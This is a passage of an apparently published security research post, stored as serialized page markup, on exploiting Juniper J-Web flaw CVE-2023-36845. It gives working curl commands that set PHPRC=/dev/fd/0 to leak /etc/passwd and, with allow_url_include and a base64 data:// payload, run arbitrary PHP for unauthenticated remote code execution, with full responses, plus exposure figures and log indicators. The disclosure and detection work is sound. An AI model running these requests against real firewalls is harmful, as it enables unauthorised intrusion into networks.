The following ",[886,87546,1557],{}," request demonstrates this attack to prepend ",[886,87549,87550],{},"\u002Fetc\u002Fpasswd"," to every response.",[1354,87553,87555],{"className":31740,"code":87554,"language":2186,"meta":219,"style":219},"$ curl \"http:\u002F\u002F10.12.72.1\u002F?PHPRC=\u002Fdev\u002Ffd\u002F0\" --data-binary 'auto_prepend_file=\"\u002Fetc\u002Fpasswd\"'\nroot:*:0:0:Charlie &:\u002Froot:\u002Fbin\u002Fcsh\ndaemon:*:1:1:Owner of many system processes:\u002Froot:\u002Fsbin\u002Fnologin\noperator:*:2:5:System &:\u002F:\u002Fsbin\u002Fnologin\nbin:*:3:7:Binaries Commands and Source:\u002F:\u002Fsbin\u002Fnologin\ntty:*:4:65533:Tty Sandbox:\u002F:\u002Fsbin\u002Fnologin\nkmem:*:5:65533:KMem Sandbox:\u002F:\u002Fsbin\u002Fnologin\ngames:*:7:13:Games pseudo-user:\u002Fusr\u002Fgames:\u002Fsbin\u002Fnologin\nman:*:9:9:Mister Man Pages:\u002Fusr\u002Fshare\u002Fman:\u002Fsbin\u002Fnologin\nsshd:*:22:22:Secure Shell Daemon:\u002Fvar\u002Fempty:\u002Fsbin\u002Fnologin\next:*:39:39:External applications:\u002F:\u002Fsbin\u002Fnologin\nbind:*:53:53:Bind Sandbox:\u002F:\u002Fsbin\u002Fnologin\nuucp:*:66:66:UUCP pseudo-user:\u002Fvar\u002Fspool\u002Fuucppublic:\u002Fsbin\u002Fnologin\nnobody:*:65534:65534:Unprivileged user:\u002Fnonexistent:\u002Fsbin\u002Fnologin\n\u003C!DOCTYPE HTML PUBLIC \"-\u002F\u002FW3C\u002F\u002FDTD HTML 4.01 Transitional\u002F\u002FEN\">\n\u003Chtml>\n  \u003Chead>\n    \u003Cmeta http-equiv=\"Content-Type\" content=\"text\u002Fhtml\"\u002F>\n    \u003Clink rel=\"stylesheet\" href=\"\u002Fstylesheet\u002Fjuniper.css\" type=\"text\u002Fcss\"\u002F>\n    \u003Ctitle>Log In - Juniper Web Device Manager\u003C\u002Ftitle>\n    \u003Clink rel=\"shortcut icon\" href='images\u002Ffavicon.ico' type=\"image\u002Fx-icon\"\u002F>\n  
\u003C\u002Fhead>\n",[886,87556,87557,87580,87591,87607,87617,87630,87638,87645,87653,87664,87675,87683,87690,87698,87706,87726,87734,87742,87771,87809,87845,87882],{"__ignoreMap":219},[1373,87558,87559,87561,87563,87565,87568,87570,87573,87575,87578],{"class":1375,"line":1376},[1373,87560,4644],{"class":2206},[1373,87562,2222],{"class":1391},[1373,87564,4883],{"class":1387},[1373,87566,87567],{"class":1391},"http:\u002F\u002F10.12.72.1\u002F?PHPRC=\u002Fdev\u002Ffd\u002F0",[1373,87569,183],{"class":1387},[1373,87571,87572],{"class":2209}," --data-binary",[1373,87574,4713],{"class":1387},[1373,87576,87577],{"class":1391},"auto_prepend_file=\"\u002Fetc\u002Fpasswd\"",[1373,87579,76063],{"class":1387},[1373,87581,87582,87585,87588],{"class":1375,"line":220},[1373,87583,87584],{"class":2206},"root:*:0:0:Charlie",[1373,87586,87587],{"class":1383}," &",[1373,87589,87590],{"class":2206},":\u002Froot:\u002Fbin\u002Fcsh\n",[1373,87592,87593,87596,87598,87601,87604],{"class":1375,"line":1266},[1373,87594,87595],{"class":2206},"daemon:*:1:1:Owner",[1373,87597,55815],{"class":1391},[1373,87599,87600],{"class":1391}," many",[1373,87602,87603],{"class":1391}," system",[1373,87605,87606],{"class":1391}," processes:\u002Froot:\u002Fsbin\u002Fnologin\n",[1373,87608,87609,87612,87614],{"class":1375,"line":1852},[1373,87610,87611],{"class":2206},"operator:*:2:5:System",[1373,87613,87587],{"class":1383},[1373,87615,87616],{"class":2206},":\u002F:\u002Fsbin\u002Fnologin\n",[1373,87618,87619,87622,87625,87627],{"class":1375,"line":4692},[1373,87620,87621],{"class":2206},"bin:*:3:7:Binaries",[1373,87623,87624],{"class":1391}," Commands",[1373,87626,67041],{"class":1391},[1373,87628,87629],{"class":1391}," Source:\u002F:\u002Fsbin\u002Fnologin\n",[1373,87631,87632,87635],{"class":1375,"line":4724},[1373,87633,87634],{"class":2206},"tty:*:4:65533:Tty",[1373,87636,87637],{"class":1391}," 
Sandbox:\u002F:\u002Fsbin\u002Fnologin\n",[1373,87639,87640,87643],{"class":1375,"line":4756},[1373,87641,87642],{"class":2206},"kmem:*:5:65533:KMem",[1373,87644,87637],{"class":1391},[1373,87646,87647,87650],{"class":1375,"line":4768},[1373,87648,87649],{"class":2206},"games:*:7:13:Games",[1373,87651,87652],{"class":1391}," pseudo-user:\u002Fusr\u002Fgames:\u002Fsbin\u002Fnologin\n",[1373,87654,87655,87658,87661],{"class":1375,"line":4792},[1373,87656,87657],{"class":2206},"man:*:9:9:Mister",[1373,87659,87660],{"class":1391}," Man",[1373,87662,87663],{"class":1391}," Pages:\u002Fusr\u002Fshare\u002Fman:\u002Fsbin\u002Fnologin\n",[1373,87665,87666,87669,87672],{"class":1375,"line":4798},[1373,87667,87668],{"class":2206},"sshd:*:22:22:Secure",[1373,87670,87671],{"class":1391}," Shell",[1373,87673,87674],{"class":1391}," Daemon:\u002Fvar\u002Fempty:\u002Fsbin\u002Fnologin\n",[1373,87676,87677,87680],{"class":1375,"line":4806},[1373,87678,87679],{"class":2206},"ext:*:39:39:External",[1373,87681,87682],{"class":1391}," applications:\u002F:\u002Fsbin\u002Fnologin\n",[1373,87684,87685,87688],{"class":1375,"line":4817},[1373,87686,87687],{"class":2206},"bind:*:53:53:Bind",[1373,87689,87637],{"class":1391},[1373,87691,87692,87695],{"class":1375,"line":4825},[1373,87693,87694],{"class":2206},"uucp:*:66:66:UUCP",[1373,87696,87697],{"class":1391}," pseudo-user:\u002Fvar\u002Fspool\u002Fuucppublic:\u002Fsbin\u002Fnologin\n",[1373,87699,87700,87703],{"class":1375,"line":4835},[1373,87701,87702],{"class":2206},"nobody:*:65534:65534:Unprivileged",[1373,87704,87705],{"class":1391}," user:\u002Fnonexistent:\u002Fsbin\u002Fnologin\n",[1373,87707,87708,87710,87712,87715,87717,87719,87722,87724],{"class":1375,"line":4843},[1373,87709,6755],{"class":1397},[1373,87711,6758],{"class":2206},[1373,87713,87714],{"class":1391}," HTML",[1373,87716,51790],{"class":1391},[1373,87718,4883],{"class":1387},[1373,87720,87721],{"class":1391},"-\u002F\u002FW3C\u002F\u002FDTD HTML 4.01 
Transitional\u002F\u002FEN",[1373,87723,183],{"class":1387},[1373,87725,6765],{"class":1397},[1373,87727,87728,87730,87732],{"class":1375,"line":4849},[1373,87729,11852],{"class":1397},[1373,87731,8230],{"class":4640},[1373,87733,6765],{"class":1397},[1373,87735,87736,87738,87740],{"class":1375,"line":4877},[1373,87737,48971],{"class":1397},[1373,87739,48974],{"class":2206},[1373,87741,6765],{"class":4640},[1373,87743,87744,87746,87748,87751,87753,87755,87757,87760,87762,87765,87767,87769],{"class":1375,"line":4915},[1373,87745,8246],{"class":1397},[1373,87747,48983],{"class":2206},[1373,87749,87750],{"class":1391}," http-equiv=",[1373,87752,183],{"class":1387},[1373,87754,6391],{"class":1391},[1373,87756,183],{"class":1387},[1373,87758,87759],{"class":1391}," content=",[1373,87761,183],{"class":1387},[1373,87763,87764],{"class":1391},"text\u002Fhtml",[1373,87766,183],{"class":1387},[1373,87768,2180],{"class":4640},[1373,87770,6765],{"class":1397},[1373,87772,87773,87775,87777,87780,87782,87784,87786,87789,87791,87794,87796,87799,87801,87803,87805,87807],{"class":1375,"line":4931},[1373,87774,8246],{"class":1397},[1373,87776,30586],{"class":2206},[1373,87778,87779],{"class":1391}," rel=",[1373,87781,183],{"class":1387},[1373,87783,49025],{"class":1391},[1373,87785,183],{"class":1387},[1373,87787,87788],{"class":1391}," href=",[1373,87790,183],{"class":1387},[1373,87792,87793],{"class":1391},"\u002Fstylesheet\u002Fjuniper.css",[1373,87795,183],{"class":1387},[1373,87797,87798],{"class":1391}," type=",[1373,87800,183],{"class":1387},[1373,87802,49066],{"class":1391},[1373,87804,183],{"class":1387},[1373,87806,2180],{"class":4640},[1373,87808,6765],{"class":1397},[1373,87810,87811,87813,87815,87817,87819,87822,87824,87827,87830,87833,87836,87838,87841,87843],{"class":1375,"line":4947},[1373,87812,8246],{"class":1397},[1373,87814,51864],{"class":2206},[1373,87816,5384],{"class":4640},[1373,87818,15072],{"class":1391},[1373,87820,87821],{"class":1391}," 
In",[1373,87823,27425],{"class":1391},[1373,87825,87826],{"class":1391}," Juniper",[1373,87828,87829],{"class":1391}," Web",[1373,87831,87832],{"class":1391}," Device",[1373,87834,87835],{"class":1391}," Manager",[1373,87837,11852],{"class":1397},[1373,87839,87840],{"class":1391},"\u002Ftitl",[1373,87842,74628],{"class":4640},[1373,87844,6765],{"class":1397},[1373,87846,87847,87849,87851,87853,87855,87858,87860,87862,87864,87867,87869,87871,87873,87876,87878,87880],{"class":1375,"line":4952},[1373,87848,8246],{"class":1397},[1373,87850,30586],{"class":2206},[1373,87852,87779],{"class":1391},[1373,87854,183],{"class":1387},[1373,87856,87857],{"class":1391},"shortcut icon",[1373,87859,183],{"class":1387},[1373,87861,87788],{"class":1391},[1373,87863,1388],{"class":1387},[1373,87865,87866],{"class":1391},"images\u002Ffavicon.ico",[1373,87868,1388],{"class":1387},[1373,87870,87798],{"class":1391},[1373,87872,183],{"class":1387},[1373,87874,87875],{"class":1391},"image\u002Fx-icon",[1373,87877,183],{"class":1387},[1373,87879,2180],{"class":4640},[1373,87881,6765],{"class":1397},[1373,87883,87884,87886,87889],{"class":1375,"line":6776},[1373,87885,48971],{"class":1397},[1373,87887,87888],{"class":2206},"\u002Fhead",[1373,87890,6765],{"class":4640},[18,87892,87893,87894,87896],{},"That’s a neat information leak (and we have another interesting one in the appendix), but it isn’t code execution. To achieve code execution, watchTowr used two files. One for the ",[886,87895,87543],{}," and one with arbitrary PHP. We can’t upload a second file, but we found a workaround for that as well.",[61,87898,87900],{"id":87899},"a-wild-php-feature-to-the-rescue","A Wild PHP Feature to the Rescue",[18,87902,87903,87905,87906,87908],{},[886,87904,87511],{}," is simple. It just causes the provided file to be added using the ",[886,87907,1622],{}," function. 
The description from php.net:",[1925,87910,87911],{},[18,87912,87913],{},"auto_prepend_file string\nSpecifies the name of a file that is automatically parsed before the main file. The file is included as if it was called with the require function, so include_path is used.",[18,87915,87916,87917,87919,87920,4606],{},"For our attack, another PHP feature pairs well with ",[886,87918,87511],{},". That feature is ",[47,87921,87924],{"href":87922,"rel":87923},"https:\u002F\u002Fwww.php.net\u002Fmanual\u002Fen\u002Ffilesystem.configuration.php#ini.allow-url-include",[51],"allow_url_include",[1925,87926,87927],{},[18,87928,87929],{},"allow_url_include bool\nThis option allows the use of URL-aware fopen wrappers with the following functions: include, include_once, require, require_once.",[18,87931,87932,87933,87935,87936,20559,87941,87943,87944,87947,87948,87951,87952,4606],{},"By enabling ",[886,87934,87924],{},", we can use any ",[47,87937,87940],{"href":87938,"rel":87939},"https:\u002F\u002Fwww.php.net\u002Fmanual\u002Fen\u002Fwrappers.php",[51],"protocol wrapper",[886,87942,87511],{},". The obvious choice is ",[886,87945,87946],{},"data:\u002F\u002F"," to provide the “second file” inline. Below is an example of this attack that executes ",[886,87949,87950],{},"\u003C? 
phpinfo(); ?>"," which is embedded in ",[886,87953,87946],{},[1354,87955,87957],{"className":31740,"code":87956,"language":2186,"meta":219,"style":219},"$ curl \"http:\u002F\u002F10.12.72.1\u002F?PHPRC=\u002Fdev\u002Ffd\u002F0\" --data-binary $'allow_url_include=1\\nauto_prepend_file=\"data:\u002F\u002Ftext\u002Fplain;base64,PD8KICAgcGhwaW5mbygpOwo\u002FPg==\"'\n\u003C!DOCTYPE html PUBLIC \"-\u002F\u002FW3C\u002F\u002FDTD XHTML 1.0 Transitional\u002F\u002FEN\" \"DTD\u002Fxhtml1-transitional.dtd\">\n\u003Chtml>\u003Chead>\n\u003Cstyle type=\"text\u002Fcss\">\nbody {background-color: #ffffff; color: #000000;}\nbody, td, th, h1, h2 {font-family: sans-serif;}\npre {margin: 0px; font-family: monospace;}\na:link {color: #000099; text-decoration: none; background-color: #ffffff;}\na:hover {text-decoration: underline;}\ntable {border-collapse: collapse;}\n.center {text-align: center;}\n.center table { margin-left: auto; margin-right: auto; text-align: left;}\n.center th { text-align: center !important; }\ntd, th { border: 1px solid #000000; font-size: 75%; vertical-align: baseline;}\nh1 {font-size: 150%;}\nh2 {font-size: 125%;}\n.p {text-align: left;}\n.e {background-color: #ccccff; font-weight: bold; color: #000000;}\n.h {background-color: #9999cc; font-weight: bold; color: #000000;}\n.v {background-color: #cccccc; color: #000000;}\n.vr {background-color: #cccccc; text-align: right; color: #000000;}\nimg {float: right; border: 0px;}\nhr {width: 600px; background-color: #cccccc; border: 0px; height: 1px; color: #000000;}\n\u003C\u002Fstyle>\n\u003Ctitle>phpinfo()\u003C\u002Ftitle>\u003Cmeta name=\"ROBOTS\" content=\"NOINDEX,NOFOLLOW,NOARCHIVE\" \u002F>\u003C\u002Fhead>\n\u003Cbody>\u003Cdiv 
class=\"center\">\n",[886,87958,87959,87986,88012,88021,88038,88048,88075,88097,88108,88123,88137,88152,88186,88206,88227,88241,88254,88267,88277,88287,88297,88307,88327,88345,88354,88392],{"__ignoreMap":219},[1373,87960,87961,87963,87965,87967,87969,87971,87973,87976,87979,87981,87984],{"class":1375,"line":1376},[1373,87962,4644],{"class":2206},[1373,87964,2222],{"class":1391},[1373,87966,4883],{"class":1387},[1373,87968,87567],{"class":1391},[1373,87970,183],{"class":1387},[1373,87972,87572],{"class":2209},[1373,87974,87975],{"class":1387}," $'",[1373,87977,87978],{"class":1391},"allow_url_include=1",[1373,87980,8943],{"class":2326},[1373,87982,87983],{"class":1391},"auto_prepend_file=\"data:\u002F\u002Ftext\u002Fplain;base64,PD8KICAgcGhwaW5mbygpOwo\u002FPg==\"",[1373,87985,76063],{"class":1387},[1373,87987,87988,87990,87992,87994,87996,87998,88001,88003,88005,88008,88010],{"class":1375,"line":220},[1373,87989,6755],{"class":1397},[1373,87991,6758],{"class":2206},[1373,87993,6762],{"class":1391},[1373,87995,51790],{"class":1391},[1373,87997,4883],{"class":1387},[1373,87999,88000],{"class":1391},"-\u002F\u002FW3C\u002F\u002FDTD XHTML 1.0 Transitional\u002F\u002FEN",[1373,88002,183],{"class":1387},[1373,88004,4883],{"class":1387},[1373,88006,88007],{"class":1391},"DTD\u002Fxhtml1-transitional.dtd",[1373,88009,183],{"class":1387},[1373,88011,6765],{"class":1397},[1373,88013,88014,88016,88019],{"class":1375,"line":1266},[1373,88015,11852],{"class":1397},[1373,88017,88018],{"class":4640},"html>\u003Chead",[1373,88020,6765],{"class":1397},[1373,88022,88023,88025,88028,88030,88032,88034,88036],{"class":1375,"line":1852},[1373,88024,11852],{"class":1397},[1373,88026,88027],{"class":4640},"style 
type",[1373,88029,5417],{"class":1397},[1373,88031,183],{"class":1387},[1373,88033,49066],{"class":1391},[1373,88035,183],{"class":1387},[1373,88037,6765],{"class":1397},[1373,88039,88040,88042,88045],{"class":1375,"line":4692},[1373,88041,20718],{"class":2206},[1373,88043,88044],{"class":1391}," {background-color:",[1373,88046,88047],{"class":4630}," #ffffff; color: #000000;}\n",[1373,88049,88050,88053,88056,88059,88062,88065,88068,88071,88073],{"class":1375,"line":4724},[1373,88051,88052],{"class":2206},"body,",[1373,88054,88055],{"class":1391}," td,",[1373,88057,88058],{"class":1391}," th,",[1373,88060,88061],{"class":1391}," h1,",[1373,88063,88064],{"class":1391}," h2",[1373,88066,88067],{"class":1391}," {font-family:",[1373,88069,88070],{"class":1391}," sans-serif",[1373,88072,39663],{"class":1383},[1373,88074,1855],{"class":4640},[1373,88076,88077,88079,88082,88085,88087,88090,88093,88095],{"class":1375,"line":4756},[1373,88078,1354],{"class":2206},[1373,88080,88081],{"class":1391}," {margin:",[1373,88083,88084],{"class":1391}," 0px",[1373,88086,39663],{"class":1383},[1373,88088,88089],{"class":2206}," font-family:",[1373,88091,88092],{"class":1391}," monospace",[1373,88094,39663],{"class":1383},[1373,88096,1855],{"class":4640},[1373,88098,88099,88102,88105],{"class":1375,"line":4768},[1373,88100,88101],{"class":2206},"a:link",[1373,88103,88104],{"class":1391}," {color:",[1373,88106,88107],{"class":4630}," #000099; text-decoration: none; background-color: #ffffff;}\n",[1373,88109,88110,88113,88116,88119,88121],{"class":1375,"line":4792},[1373,88111,88112],{"class":2206},"a:hover",[1373,88114,88115],{"class":1391}," {text-decoration:",[1373,88117,88118],{"class":1391}," underline",[1373,88120,39663],{"class":1383},[1373,88122,1855],{"class":4640},[1373,88124,88125,88127,88130,88133,88135],{"class":1375,"line":4798},[1373,88126,307],{"class":2206},[1373,88128,88129],{"class":1391}," {border-collapse:",[1373,88131,88132],{"class":1391}," 
collapse",[1373,88134,39663],{"class":1383},[1373,88136,1855],{"class":4640},[1373,88138,88139,88142,88145,88148,88150],{"class":1375,"line":4806},[1373,88140,88141],{"class":2206},".center",[1373,88143,88144],{"class":1391}," {text-align:",[1373,88146,88147],{"class":1391}," center",[1373,88149,39663],{"class":1383},[1373,88151,1855],{"class":4640},[1373,88153,88154,88156,88159,88161,88164,88167,88169,88172,88174,88176,88179,88182,88184],{"class":1375,"line":4817},[1373,88155,88141],{"class":2206},[1373,88157,88158],{"class":1391}," table",[1373,88160,5420],{"class":1391},[1373,88162,88163],{"class":1391}," margin-left:",[1373,88165,88166],{"class":1391}," auto",[1373,88168,39663],{"class":1383},[1373,88170,88171],{"class":2206}," margin-right:",[1373,88173,88166],{"class":1391},[1373,88175,39663],{"class":1383},[1373,88177,88178],{"class":2206}," text-align:",[1373,88180,88181],{"class":1391}," left",[1373,88183,39663],{"class":1383},[1373,88185,1855],{"class":4640},[1373,88187,88188,88190,88193,88195,88197,88199,88202,88204],{"class":1375,"line":4825},[1373,88189,88141],{"class":2206},[1373,88191,88192],{"class":1391}," th",[1373,88194,5420],{"class":1391},[1373,88196,88178],{"class":1391},[1373,88198,88147],{"class":1391},[1373,88200,88201],{"class":1391}," !important",[1373,88203,39663],{"class":1383},[1373,88205,35334],{"class":4640},[1373,88207,88208,88211,88213,88215,88218,88221,88224],{"class":1375,"line":4835},[1373,88209,88210],{"class":2206},"td,",[1373,88212,88192],{"class":1391},[1373,88214,5420],{"class":1391},[1373,88216,88217],{"class":1391}," border:",[1373,88219,88220],{"class":1391}," 1px",[1373,88222,88223],{"class":1391}," solid",[1373,88225,88226],{"class":4630}," #000000; font-size: 75%; vertical-align: baseline;}\n",[1373,88228,88229,88231,88234,88237,88239],{"class":1375,"line":4843},[1373,88230,1920],{"class":2206},[1373,88232,88233],{"class":1391}," {font-size:",[1373,88235,88236],{"class":1391}," 
150%",[1373,88238,39663],{"class":1383},[1373,88240,1855],{"class":4640},[1373,88242,88243,88245,88247,88250,88252],{"class":1375,"line":4849},[1373,88244,61],{"class":2206},[1373,88246,88233],{"class":1391},[1373,88248,88249],{"class":1391}," 125%",[1373,88251,39663],{"class":1383},[1373,88253,1855],{"class":4640},[1373,88255,88256,88259,88261,88263,88265],{"class":1375,"line":4877},[1373,88257,88258],{"class":2206},".p",[1373,88260,88144],{"class":1391},[1373,88262,88181],{"class":1391},[1373,88264,39663],{"class":1383},[1373,88266,1855],{"class":4640},[1373,88268,88269,88272,88274],{"class":1375,"line":4915},[1373,88270,88271],{"class":2206},".e",[1373,88273,88044],{"class":1391},[1373,88275,88276],{"class":4630}," #ccccff; font-weight: bold; color: #000000;}\n",[1373,88278,88279,88282,88284],{"class":1375,"line":4931},[1373,88280,88281],{"class":2206},".h",[1373,88283,88044],{"class":1391},[1373,88285,88286],{"class":4630}," #9999cc; font-weight: bold; color: #000000;}\n",[1373,88288,88289,88292,88294],{"class":1375,"line":4947},[1373,88290,88291],{"class":2206},".v",[1373,88293,88044],{"class":1391},[1373,88295,88296],{"class":4630}," #cccccc; color: #000000;}\n",[1373,88298,88299,88302,88304],{"class":1375,"line":4952},[1373,88300,88301],{"class":2206},".vr",[1373,88303,88044],{"class":1391},[1373,88305,88306],{"class":4630}," #cccccc; text-align: right; color: #000000;}\n",[1373,88308,88309,88311,88314,88317,88319,88321,88323,88325],{"class":1375,"line":6776},[1373,88310,68],{"class":2206},[1373,88312,88313],{"class":1391}," {float:",[1373,88315,88316],{"class":1391}," right",[1373,88318,39663],{"class":1383},[1373,88320,88217],{"class":2206},[1373,88322,88084],{"class":1391},[1373,88324,39663],{"class":1383},[1373,88326,1855],{"class":4640},[1373,88328,88329,88331,88334,88337,88339,88342],{"class":1375,"line":6781},[1373,88330,1308],{"class":2206},[1373,88332,88333],{"class":1391}," {width:",[1373,88335,88336],{"class":1391}," 
600px",[1373,88338,39663],{"class":1383},[1373,88340,88341],{"class":2206}," background-color:",[1373,88343,88344],{"class":4630}," #cccccc; border: 0px; height: 1px; color: #000000;}\n",[1373,88346,88347,88349,88352],{"class":1375,"line":7524},[1373,88348,11852],{"class":1397},[1373,88350,88351],{"class":4640},"\u002Fstyle",[1373,88353,6765],{"class":1397},[1373,88355,88356,88359,88361,88363,88366,88368,88370,88373,88375,88377,88379,88381,88384,88386,88389],{"class":1375,"line":7530},[1373,88357,88358],{"class":7297},"\u003Ctitle>phpinfo",[1373,88360,7514],{"class":1383},[1373,88362,11852],{"class":1397},[1373,88364,88365],{"class":4640},"\u002Ftitle>\u003Cmeta name",[1373,88367,5417],{"class":1397},[1373,88369,183],{"class":1387},[1373,88371,88372],{"class":1391},"ROBOTS",[1373,88374,183],{"class":1387},[1373,88376,51846],{"class":4640},[1373,88378,5417],{"class":1397},[1373,88380,183],{"class":1387},[1373,88382,88383],{"class":1391},"NOINDEX,NOFOLLOW,NOARCHIVE",[1373,88385,183],{"class":1387},[1373,88387,88388],{"class":2206}," \u002F",[1373,88390,88391],{"class":4640},">\u003C\u002Fhead>\n",[1373,88393,88394,88396,88399,88401,88403,88405,88407],{"class":1375,"line":7546},[1373,88395,11852],{"class":1397},[1373,88397,88398],{"class":4640},"body>\u003Cdiv class",[1373,88400,5417],{"class":1397},[1373,88402,183],{"class":1387},[1373,88404,318],{"class":1391},[1373,88406,183],{"class":1387},[1373,88408,6765],{"class":1397},[18,88410,88411],{},"Just like that, by only using CVE-2023-36845, we’ve achieved unauthenticated and remote code execution without actually dropping a file on disk. 
Our private exploit establishes a reverse shell, but that’s quite trivial once you’ve reached this point.",[61,88413,88415],{"id":88414},"real-world-impact","Real World Impact",[18,88417,88418,88422],{},[47,88419,41731],{"href":88420,"rel":88421},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=title%3A%22Juniper%22+http.favicon.hash%3A2141724739",[51]," shows approximately 15,000 Juniper devices with internet-facing web interfaces (caution has to be taken when crafting this query because there are about the same amount of honeypots):",[18,88424,88425],{},[68,88426],{":width":10862,"alt":88427,"src":88428},"Juniper J-Web on Shodan","\u002Fblog\u002Fjuniper-cve-2023-36845\u002Fshodan-jweb.png",[18,88430,88431,88432,88435,88436,88440],{},"We wrote a scanner that generates an error on affected systems by setting the LD_PRELOAD environment variable. We’ve made it available on ",[47,88433,2485],{"href":83426,"rel":88434},[51],". On a representative sample size (n=3000), we found that 79% of the responding targets were unpatched. This is particularly troublesome since both ",[47,88437,11024],{"href":88438,"rel":88439},"https:\u002F\u002Fx.com\u002FShadowserver\u002Fstatus\u002F1696512418036486246",[51]," and GreyNoise have seen attackers probing the watchTowr endpoint (webauth_operation.php).",[18,88442,88443],{},[68,88444],{":width":10862,"alt":88445,"src":88446},"Juniper attacker on Greynoise","\u002Fblog\u002Fjuniper-cve-2023-36845\u002Fgreynoise-webauth-operation.png",[18,88448,88449,88450,88452],{},"Firewalls are interesting targets to APT as they help bridge into the protected network and can serve as useful hosts for C2 infrastructure. Anyone who has an unpatched Juniper firewall should examine it for signs of compromise. 
The ",[886,88451,86174],{}," is particularly useful as it may contain tidbits like:",[1925,88454,88455],{},[18,88456,88457],{},"httpd: 2: POST \u002F?PHPRC=\u002Fdev\u002Ffd\u002F0 HTTP\u002F1.1",[18,88459,88460],{},"It’s worth noting that attackers can get around including variables in the HTTP header; we only did that here for clarity. For example, the information leak works just fine using multipart form data:",[1354,88462,88464],{"className":31740,"code":88463,"language":2186,"meta":219,"style":219},"$ curl \"http:\u002F\u002F10.12.72.1\u002F\" -F $'auto_prepend_file=\"\u002Fetc\u002Fpasswd\\n\"' -F 'PHPRC=\u002Fdev\u002Ffd\u002F0'\nroot:*:0:0:Charlie &:\u002Froot:\u002Fbin\u002Fcsh\ndaemon:*:1:1:Owner of many system processes:\u002Froot:\u002Fsbin\u002Fnologin\noperator:*:2:5:System &:\u002F:\u002Fsbin\u002Fnologin\nbin:*:3:7:Binaries Commands and Source:\u002F:\u002Fsbin\u002Fnologin\ntty:*:4:65533:Tty Sandbox:\u002F:\u002Fsbin\u002Fnologin\nkmem:*:5:65533:KMem Sandbox:\u002F:\u002Fsbin\u002Fnologin\ngames:*:7:13:Games pseudo-user:\u002Fusr\u002Fgames:\u002Fsbin\u002Fnologin\nman:*:9:9:Mister Man Pages:\u002Fusr\u002Fshare\u002Fman:\u002Fsbin\u002Fnologin\nsshd:*:22:22:Secure Shell Daemon:\u002Fvar\u002Fempty:\u002Fsbin\u002Fnologin\next:*:39:39:External applications:\u002F:\u002Fsbin\u002Fnologin\nbind:*:53:53:Bind Sandbox:\u002F:\u002Fsbin\u002Fnologin\nuucp:*:66:66:UUCP pseudo-user:\u002Fvar\u002Fspool\u002Fuucppublic:\u002Fsbin\u002Fnologin\nnobody:*:65534:65534:Unprivileged user:\u002Fnonexistent:\u002Fsbin\u002Fnologin\n\u003C!DOCTYPE HTML PUBLIC \"-\u002F\u002FW3C\u002F\u002FDTD HTML 4.01 Transitional\u002F\u002FEN\">\n\u003Chtml>\n  \u003Chead>\n    \u003Cmeta http-equiv=\"Content-Type\" content=\"text\u002Fhtml\"\u002F>\n    \u003Clink rel=\"stylesheet\" href=\"\u002Fstylesheet\u002Fjuniper.css\" type=\"text\u002Fcss\"\u002F>\n    \u003Ctitle>Log In - Juniper Web Device Manager\u003C\u002Ftitle>\n    \u003Clink rel=\"shortcut icon\" 
href='images\u002Ffavicon.ico' type=\"image\u002Fx-icon\"\u002F>\n  \u003C\u002Fhead>\n",[886,88465,88466,88502,88510,88522,88530,88540,88546,88552,88558,88566,88574,88580,88586,88592,88598,88616,88624,88632,88658,88692,88722,88756],{"__ignoreMap":219},[1373,88467,88468,88470,88472,88474,88477,88479,88482,88484,88487,88489,88491,88493,88495,88497,88500],{"class":1375,"line":1376},[1373,88469,4644],{"class":2206},[1373,88471,2222],{"class":1391},[1373,88473,4883],{"class":1387},[1373,88475,88476],{"class":1391},"http:\u002F\u002F10.12.72.1\u002F",[1373,88478,183],{"class":1387},[1373,88480,88481],{"class":2209}," -F",[1373,88483,87975],{"class":1387},[1373,88485,88486],{"class":1391},"auto_prepend_file=\"\u002Fetc\u002Fpasswd",[1373,88488,8943],{"class":2326},[1373,88490,183],{"class":1391},[1373,88492,1388],{"class":1387},[1373,88494,88481],{"class":2209},[1373,88496,4713],{"class":1387},[1373,88498,88499],{"class":1391},"PHPRC=\u002Fdev\u002Ffd\u002F0",[1373,88501,76063],{"class":1387},[1373,88503,88504,88506,88508],{"class":1375,"line":220},[1373,88505,87584],{"class":2206},[1373,88507,87587],{"class":1383},[1373,88509,87590],{"class":2206},[1373,88511,88512,88514,88516,88518,88520],{"class":1375,"line":1266},[1373,88513,87595],{"class":2206},[1373,88515,55815],{"class":1391},[1373,88517,87600],{"class":1391},[1373,88519,87603],{"class":1391},[1373,88521,87606],{"class":1391},[1373,88523,88524,88526,88528],{"class":1375,"line":1852},[1373,88525,87611],{"class":2206},[1373,88527,87587],{"class":1383},[1373,88529,87616],{"class":2206},[1373,88531,88532,88534,88536,88538],{"class":1375,"line":4692},[1373,88533,87621],{"class":2206},[1373,88535,87624],{"class":1391},[1373,88537,67041],{"class":1391},[1373,88539,87629],{"class":1391},[1373,88541,88542,88544],{"class":1375,"line":4724},[1373,88543,87634],{"class":2206},[1373,88545,87637],{"class":1391},[1373,88547,88548,88550],{"class":1375,"line":4756},[1373,88549,87642],{"class":2206},[1373,88551,87637],{"class":1391}
,[1373,88553,88554,88556],{"class":1375,"line":4768},[1373,88555,87649],{"class":2206},[1373,88557,87652],{"class":1391},[1373,88559,88560,88562,88564],{"class":1375,"line":4792},[1373,88561,87657],{"class":2206},[1373,88563,87660],{"class":1391},[1373,88565,87663],{"class":1391},[1373,88567,88568,88570,88572],{"class":1375,"line":4798},[1373,88569,87668],{"class":2206},[1373,88571,87671],{"class":1391},[1373,88573,87674],{"class":1391},[1373,88575,88576,88578],{"class":1375,"line":4806},[1373,88577,87679],{"class":2206},[1373,88579,87682],{"class":1391},[1373,88581,88582,88584],{"class":1375,"line":4817},[1373,88583,87687],{"class":2206},[1373,88585,87637],{"class":1391},[1373,88587,88588,88590],{"class":1375,"line":4825},[1373,88589,87694],{"class":2206},[1373,88591,87697],{"class":1391},[1373,88593,88594,88596],{"class":1375,"line":4835},[1373,88595,87702],{"class":2206},[1373,88597,87705],{"class":1391},[1373,88599,88600,88602,88604,88606,88608,88610,88612,88614],{"class":1375,"line":4843},[1373,88601,6755],{"class":1397},[1373,88603,6758],{"class":2206},[1373,88605,87714],{"class":1391},[1373,88607,51790],{"class":1391},[1373,88609,4883],{"class":1387},[1373,88611,87721],{"class":1391},[1373,88613,183],{"class":1387},[1373,88615,6765],{"class":1397},[1373,88617,88618,88620,88622],{"class":1375,"line":4849},[1373,88619,11852],{"class":1397},[1373,88621,8230],{"class":4640},[1373,88623,6765],{"class":1397},[1373,88625,88626,88628,88630],{"class":1375,"line":4877},[1373,88627,48971],{"class":1397},[1373,88629,48974],{"class":2206}